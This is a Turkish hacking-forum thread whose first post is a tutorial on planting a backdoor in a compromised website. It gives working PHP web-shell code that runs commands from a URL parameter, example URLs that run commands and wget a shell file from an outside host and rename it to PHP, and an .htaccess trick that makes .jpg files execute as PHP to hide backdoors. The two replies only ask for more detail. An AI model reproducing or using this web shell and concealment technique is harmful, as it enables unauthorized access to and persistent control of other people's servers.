İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Siteye Backdoor Atma//AloneAngels

05-03-2019 21:19
#1
Üyelik tarihi:
11/2015
Nereden:
/etc/passwd
Yaş:
19
Mesajlar:
461
Teşekkür (Etti):
21
Teşekkür (Aldı):
81
Konular:
93
Merhaba Dostlarım Bugün Sizlerle Siteye BackDoor Atmayı İnceleyecez Merakınız Artıysa Başlayalım Hemen
Kod:
<?php
$Aloneangels= $_GET["AloneAngels"];
if($AloneAngels){
echo exec($AloneAngels);
echo shell_exec($AloneAngels);
echo proc_open($AloneAngels);
echo system($AloneAngels);
echo popen($AloneAngels);
echo passthru($AloneAngels);
}
?>
Şimdi geldi kullanmaya arkadaşlar, erişmiş olduğumuz sitede
bir php dosyasının içine yukarıdaki kodları ekliyoruz ve şu şekilde komutlarımızı çalıştırıyoruz

Kod:
www.siteadi.com/ayar.php?ayar=ls
uname, passwd, wget, curl vs. akla gelebilecek komutları istediğimiz gibi çalıştırabiliriz.
Şimdi istersek txt olarak shell çağıralım

Kod:
www.siteadi.com/ayar.php?ayar=wget http://Aloneangels.com/denemeshell.txt
Şimdi ise çektiğimiz .txt shelli php yapalım, peki neden txt olarak çektik ?
uzaktan direkt olarak php okuyamayız arkadaşlar önce txt olarak çekicez ki
sonrasında aşağıdaki komutumuzla .txt'i .php haline getireceğiz.

Kod:
www.siteadi.com/ayar.php?ayar=mv ornekshell.txt ayar.php
Bu şekilde shellimizi ayar.php olarak aktif hale getirdik
Yalnız arkadaşlar bu fonksiyonlar disable edilmiş ise işimiz zorlaşacaktır.
o zamanda .htaccess ile .jpg uzantısını php gibi okutarak istediğimizi yapabiliriz

ve dizinde yine backdoor saklayabiliriz.

örnek olarak bir /dizin/ oluşturun içine .htaccess dosyası oluşturun ve içine şunu ekleyin.

Kod:
AddType application/x-httpd-php .jpg
Şimdi arkadaşlar resim.jpg dosyası oluşturup kaynağına shell kodları ekleyebilirsiniz
resim.jpg yi php olarak çalıştıracak
İşin özü uzaktan komut çalıştıramıyorsak
.htaccess ile yine backdoor yerleştirebiliriz. }
Kullanıcı İmzası
Aman Aman Dostlar Yoldan Geldim Yorgunum
Hedef SolidStar Zirve SoloTürk
Twitter
Hll qnq, Battani670 Teşekkür etti.

05-03-2019 23:19
#2
ByQueny - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Bilinmiyor
Mesajlar:
617
Teşekkür (Etti):
17
Teşekkür (Aldı):
62
Konular:
16
Dostum resim ve detay ekliyerek daha iyi bir konu haline getirebilirsin
Kullanıcı İmzası
Türk olmak zordur.Dünya ile savaşırsın.
Türk olmamak daha zordur.Türk ile savaşırsın.

Software Developer & Cyber Security
05-03-2019 23:27
#3
Üyelik tarihi:
12/2006
Nereden:
Siber Alem
Yaş:
32
Mesajlar:
1.111
Teşekkür (Etti):
5
Teşekkür (Aldı):
77
Konular:
12
hocam bunu uygulayarak anlatırmısın rica etsem
Kullanıcı İmzası
Ya Devlet Başa,Ya Kuzgun Leşe
Hak Arayan Varsa Hakkını Verin, Baş Kaldıran Varsa Başını Kesin
II.Abdulhamid Han

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı